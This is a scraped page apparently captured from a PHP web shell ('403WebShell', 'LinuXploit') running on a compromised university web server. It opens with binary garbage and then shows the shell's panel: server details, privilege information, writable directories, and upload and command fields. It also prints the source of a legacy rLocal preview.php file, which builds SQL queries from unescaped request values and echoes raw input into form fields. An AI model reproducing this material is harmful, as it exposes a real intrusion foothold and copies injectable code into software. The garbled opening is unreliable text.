h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/rlocal/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/rlocal/preview.php
<?
/*=========================================================================

:: rLocal -- web local database
:: Copyright (C) 2001 Thana Charuphanthuset
:: see http://www.OhioNet.cjb.net for more

=*=======================================================================*/

include("include/common.inc.php");
include("include/commonfile.inc.php");

/* debug */
if (0) {
	F_debug($HTTP_POST_VARS);
}

/* if no summary, form summary from story. */
if (empty($Summary)) {
	if ($CONF["SummaryLength"]==0) {
		$summ	= $Content;
	} else {
		$summ	= F_genSummary($Content);
	}
} else {
	$summ	= $Summary;
}

if ($mode==_SUBMIT) {

	$msg	= urlencode(_STORYOK);
	$rid	= F_getRid();
	if ($save=="on") {
		F_saveUser($Author,$AuthorEmail,$AuthorURL);
	}
	if ($CONF["Moderation"]==0 || F_isAdmin()) {
		$valflag	= "'Y',";
	} else {
		$valflag	= "'N',";
	}
	/* Run Kad */
	$NULL_ID = "0";
	if ((!empty($picStoryURL)) && $picStoryURL != none){
		$gsid = F_getPicFileStoryID();
	} else {
		$gsid = "NULL";
	}
	if ((!empty($fileStoryURL)) && $fileStoryURL != none){
		$fsid = F_getPicFileStoryID();
	} else {
		$fsid = "NULL";
	}
	/* End Kad */
	
	$sql	= "INSERT INTO T_Stories ";
	$sql	.= "(Rid,Verified,Topic,Heading,KeyWords,Summary,Content,Host,Author,AuthorEmail,AuthorURL,PicStorieID,FileStorieID,EmailComments,Hits,Birthstamp,Repostamp) ";
	$sql	.= "VALUES (";
	$sql	.= "'" . $rid . "',";
	$sql	.= $valflag;
	$sql	.= $CONF["Topics"]>0 ? $Topic : 0;
	$sql	.= ",'" . htmlspecialchars(addslashes($Heading)) . "',";
	$sql	.= "'" . addslashes($KeyWords) . "',";
	$sql	.= "'" . addslashes($summ) . "',";
	$sql	.= "'" . addslashes($Content) . "',";
	$sql	.= "'" . F_getIP() . "',";
	$sql	.= "'" . strip_tags(addslashes($Author)) . "',";
	$sql	.= "'" . addslashes($AuthorEmail) . "',";
	$sql	.= "'" . addslashes($AuthorURL) . "',";
	if ($gsid != "NULL"){
		$sql	.= "'" . $gsid . "',";
	}else{
		$sql    .= "'" . $NULL_ID . "',";
	}	
	if ($fsid != "NULL"){
		$sql	.= "'" . $fsid . "',";
	}else{
		$sql    .= "'" . $NULL_ID . "',";
	}
	$sql	.= $EmailComments=="on" ? "1," : "0,";
	$sql	.= "1,";
	$sql	.= "now(),";
	$sql	.= "now()";
	$sql	.= ")";
	$RET	= @mysql_query($sql,$db);

	/* Run Kad */
	if ((!($RET<1)) && ($gsid != "NULL")) {
		$gpsf   = F_getPicStoryfile($gsid,$picStoryURL,$picStoryURL_name);
		$sql0   = "INSERT INTO T_PicStorie ";
		$sql0   .= "(PicStorieID,ImgURL,AltTag,Timestamp) ";
		$sql0   .= "VALUES (";
		$sql0   .= "'" . $gsid . "',";
		$sql0   .= "'" . addslashes($gpsf) . "',";
		$sql0   .= "'" . htmlspecialchars(addslashes($Heading)) . "',";
		$sql0   .= "now()";
		$sql0   .= ")";
		$RET    = @mysql_query($sql0,$db);
	} 
	if ((!($RET<1)) && ($fsid != "NULL")) {
		$gfsf   = F_getFileStoryfile($fsid,$fileStoryURL,$fileStoryURL_name);
		$sql1   = "INSERT INTO T_FileStorie ";
		$sql1   .= "(FileStorieID,FileURL,AltTag,Timestamp) ";
		$sql1   .= "VALUES (";
		$sql1   .= "'" . $fsid . "',";
		$sql1   .= "'" . addslashes($gfsf) . "',";
		$sql1   .= "'" . htmlspecialchars(addslashes($Heading)) . "',";
		$sql1   .= "now()";
		$sql1   .= ")";
		$RET    = @mysql_query($sql1,$db);
	}
	/* End Kad */

	if ($RET<1) {
		F_error("Unable to insert story $rid");
	} else {

		if (!empty($Links)) {
			for (reset($Links);$k=key($Links);next($Links)) {
				$sql	= "INSERT INTO T_IndexLinks ";
				$sql	.= "(ParentRid,Name,URL,Hits) ";
				$sql	.= "VALUES ('$rid','$k','$Links[$k]',0)";
				@mysql_query($sql,$db);
			}
		}
		if ($CONF["Backend"]>0) {
			export_rdf();
		}
		if ($CONF["MailingList"]>0 && $valflag == "'Y',") {
			F_mailtoList($rid);
		}
		if ($CONF["Moderation"]==2) {
			F_notifyAdmin($Topic,$Heading,$Author,$AuthorEmail);
		}
		header("Location:$G_URL/stories.php?msg=$msg");
	}
	exit();
}

include("include/header.inc.php");


$HTTP_POST_VARS["Birthstamp"] = date("Y-m-d H:i:s",time());
$HTTP_POST_VARS["Host"] = F_getIP();
F_drawStory($HTTP_POST_VARS);

$VAR["Heading"] = _PRESTORY;
$VAR["Content"] = _PRETEXT;
$VAR["Content"] .= "
<form
	action	= \"$G_URL/preview.php\"
	name	= \"Preview\"
	method	= post
	enctype = \"multipart/form-data\"
	onsubmit= \"return validatePreview()\">
<table	width	= 100%
	cellspacing	= 0
	cellpadding	= 3
	border	= 0>
<tr>
<td>" . _TITLE . ":</td>
<td><input	type	= text
	size	= 40
	maxlength=48
	name	= Heading
	value	= \"" . strip_tags(stripslashes($Heading)) . "\"></td>
</tr>
<tr>
<td>" . _KEYWORDS . ":</td>
<td><input	type	= text
	size	= 40
	maxlength=100
	name	= KeyWords
	value	= \"" . strip_tags(stripslashes($KeyWords)) . "\"></td>
</tr>";

if ($CONF["Topics"]>0) {
$VAR["Content"] .= "
	<tr>
	<td>" . _TOPIC . ":</td>
	<td>
	<select	name	= \"Topic\">";
$VAR["Content"] .= F_topicsel(0,"post");
$VAR["Content"] .= "
	</select>
	</tr>";
}

if ($CONF["SummaryLength"]>0) {
$VAR["Content"] .= "
<tr>
<td	colspan	= 2>" . _SUMMARY . ":<br>
<textarea
	name	= Summary
	rows	= 5
	cols	= 80
	wrap	= physical>" . stripslashes($summ) . "</textarea></td>
</tr>";
}

$VAR["Content"] .= "
<tr>
<td	colspan	= 2>" . _STORY . ":<br>
<textarea
	name	= Content
	rows	= 10
	cols	= 80
	wrap	= physical>" . stripslashes($Content) . "</textarea></td>
</tr>

<tr>
<td>" . _PICSTORY . ":</td>
<td><input	type	= file
	size	= 40
	name	= picStoryURL></td>
</tr>

<tr>
<td>" . _FILESTORY . ":</td>
<td><input	type	= file
	size	= 40
	name	= fileStoryURL></td>
</tr>
";

/*== off-site link / external url ==*/
if (!empty($Links)) {
	$VAR["Content"] .= F_editIndexes($Links);
}

$VAR["Content"] .= "
<tr>
<td	colspan	= 2>
<input	type	= hidden
	name	= Author
	value	= \"" . $Author . "\">
<input	type	= hidden
	name	= AuthorEmail
	value	= \"" . $AuthorEmail . "\">
<input	type	= hidden
	name	= AuthorURL
	value	= \"" . $AuthorURL . "\">
<input	type	= hidden
	name	= save
	value	= \"" . $save . "\">
<input	type	= hidden
	name	= EmailComments
	value	= \"" . $EmailComments . "\">
<input	type	= hidden
	name	= what
	value	= \"news\">
<input	type	= submit
	name	= mode
	value	= \"" . _SUBMIT . "\">
<input	type	= submit
	name	= mode
	value	= \"" . _PREVIEW . "\"></td>
</tr>
</table>
</form>";

F_drawMain($VAR);


include("include/footer.inc.php");
?>

Youez - 2016 - github.com/yon3zu
LinuXploit